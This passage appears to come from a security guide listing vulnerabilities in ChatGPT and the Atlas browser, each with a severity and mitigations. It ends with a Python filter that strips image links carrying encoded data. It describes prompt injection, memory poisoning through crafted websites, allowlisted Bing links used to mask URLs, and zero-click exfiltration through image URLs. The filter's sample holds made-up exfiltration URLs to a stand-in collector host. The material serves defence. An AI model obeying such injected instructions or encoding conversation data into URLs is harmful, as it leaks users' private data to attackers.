SSRF in pictureproxy.php of ChatGPT codebase. Allows attackers to inject malicious URLs into input parameters, forcing the application to make unintended requests. Over 10,000 attacks in one week. Note: OpenAI disputed the attribution, stating the vulnerable repo was not part of ChatGPT's production systems.
WAF rules for SSRF patterns; URL validation on all input parameters; monitor for SSRF indicators in logs
Memory Injection (Tenable, 2025)
High
Seven vulnerabilities in GPT-4o and GPT-5 models. CSRF flaw allows injecting malicious instructions into ChatGPT's persistent memory via crafted websites. Corrupted memory persists across devices and sessions.
Periodically review stored memories; be cautious when asking ChatGPT to summarize untrusted websites
One-Click Prompt Injection
Medium
Crafted URLs in format chatgpt.com/?q={Prompt} auto-execute queries when clicked. Combined with other techniques for data exfiltration.
bing.com is allowlisted as safe in ChatGPT. Bing ad tracking links (bing.com/ck/a) can mask malicious URLs, rendering them in chat as trusted links.
Don't trust links rendered in ChatGPT output without independent verification
Zero-Click Data Exfiltration
High
Indirect prompt injection via browsing context causes ChatGPT to exfiltrate conversation data by rendering images with data encoded in URL parameters to attacker-controlled servers.
Output filtering for encoded data in URLs; restrict image rendering from untrusted domains
Malicious websites inject persistent instructions into Atlas browser memories. Corrupted memory persists across sessions and can control future AI behavior.
Regularly audit browser memories; avoid browsing untrusted sites with Atlas
Clipboard Hijacking
High
Hidden "copy to clipboard" actions on web pages overwrite clipboard with malicious links when Atlas navigates the site. Later paste actions redirect to phishing sites.
Don't paste content from clipboard after Atlas browsing sessions without inspection
Weak Anti-Phishing
High
LayerX testing showed Atlas stopped only 5.8% of malicious web pages (vs. 53% for Edge, 47% for Chrome).
Don't rely on Atlas as a primary browser; use traditional browsers with better security controls
Prompt Injection via Omnibox
Medium
Atlas omnibox can be jailbroken by disguising malicious prompts as URLs.
Treat Atlas as an untrusted execution environment; don't use for sensitive browsing
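The mitigation listed above for Zero-Click Data Exfiltration (output filtering for encoded data in URLs, and restricting image rendering from untrusted domains) can be applied to model output before it is rendered. The following is an added example, not code from OpenAI or from the reports cited on this page. The allowlisted host, the 24-character threshold, the function names and the sample text are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumption: the only host this deployment trusts to serve images (constructed).
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}
# Markdown image syntax only; HTML <img> tags would need a separate pass.
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)")
# A run of 24+ base64/base64url/hex characters, optionally padded.
# Conservative on purpose: long opaque identifiers are flagged too.
ENCODED = re.compile(r"^[A-Za-z0-9+/_-]{24,}={0,2}$")

def check_image_url(url):
    """Return the reason the URL is blocked, or None if it may be rendered."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return "unparseable URL"
    if parts.scheme != "https":
        return "non-https scheme"
    if (parts.hostname or "").lower() not in ALLOWED_IMAGE_HOSTS:
        return "host not allowlisted"
    # Inspect each path segment and query value after percent-decoding.
    values = parts.path.split("/")
    values += [pair.partition("=")[2] for pair in parts.query.split("&")]
    if any(ENCODED.match(unquote(v)) for v in values):
        return "encoded data in URL"
    return None

def filter_output(markdown):
    """Replace blocked images with a text stub; return (clean_text, findings)."""
    findings = []
    def replace(match):
        alt, url = match.group(1), match.group(2)
        reason = check_image_url(url)
        if reason is None:
            return match.group(0)
        findings.append((url, reason))
        return f"[image removed: {alt or 'no alt text'}]"
    return MD_IMAGE.sub(replace, markdown), findings

# Constructed model output: one benign image and two that should be blocked.
SAMPLE = (
    "Here is the chart: ![chart](https://cdn.example.com/img/chart.png)\n"
    "![x](https://collector.example.net/p.png?d=Q29udmVyc2F0aW9uIHNlY3JldCBkYXRh)\n"
    "![logo](https://cdn.example.com/i.png?s=c2Vzc2lvbiB0b2tlbiBhbmQgZW1haWw=)"
)

if __name__ == "__main__":
    clean, findings = filter_output(SAMPLE)
    print(clean)
    for url, reason in findings:
        print(f"blocked {url}: {reason}")
```

The findings list is what a detection pipeline would log; the host check is the primary control, and the encoded-value check covers data smuggled through a host that is itself allowlisted.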